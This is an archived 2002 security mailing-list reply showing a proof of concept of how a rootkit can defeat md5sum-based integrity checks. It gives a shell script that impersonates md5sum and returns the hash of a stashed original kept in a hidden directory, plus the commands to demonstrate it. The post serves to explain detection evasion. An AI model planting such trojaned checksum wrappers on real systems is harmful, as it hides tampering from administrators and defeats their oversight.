Re: http attack
From: RainbowHat (nHiATlE@blSackholeP.mAit.edMu.invalid)Date: 04/03/02
- Next message: RainbowHat: "Re: Giving shutdown rights to somebody"
- Previous message: Alan Hopper: "Securing X11"
- In reply to: Nico Kadel-Garcia: "Re: http attack"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: RainbowHat <nHiATlE@blSackholeP.mAit.edMu.invalid> Date: Wed, 3 Apr 2002 18:26:59 +0000 (UTC)
< Nico Kadel-Garcia
>Insufficient. Some rootkits apparently replace md5sum. I'd suggest
>re-installing, it's usually a lot faster.
Here is a proof of concept. Please try. But real LKM or libc rootkits
are more sophisticated. MD5, AIDE and Tripwire ineffect.
cd ~; mkdir bin; echo 31337 > bin/laden; md5sum bin/laden
6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden
echo 32i1 > bin/laden; md5sum bin/laden #chown -R usa.usa bin/laden
5a2f88c1de17af5707bb5c51b47b37a4 bin/laden
Copy, paste to ./md5sum file and save.
-------------------8<------------------8<-------------------8<--------
#!/bin/sh
#
# This is not an April full but a proof of concept code.
#
#Vreal="$(which md5sum)"
Vreal='/usr/bin/md5sum'
if [ "$(echo $1 | grep laden)" ] # here is a bug but simple
then
$Vreal dev/.cave/laden | sed "s,dev/\.cave/laden,$1,"
else
$Vreal "$@"
fi
-------------------8<------------------8<-------------------8<--------
chmod u+x ./md5sum; mkdir -p dev/.cave; echo 31337 > bin/laden
cp -a bin/laden dev/.cave; ./md5sum bin/laden
6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden
echo 32i1 > bin/laden; ./md5sum bin/laden #chown -R usa.usa bin/laden
6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden
-- Best Regards, RainbowHat. I support FULL DISCLOSURE. ----+----1----+----2----+----3----+----4----+----5----+----6----+----7
- Next message: RainbowHat: "Re: Giving shutdown rights to somebody"
- Previous message: Alan Hopper: "Securing X11"
- In reply to: Nico Kadel-Garcia: "Re: http attack"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
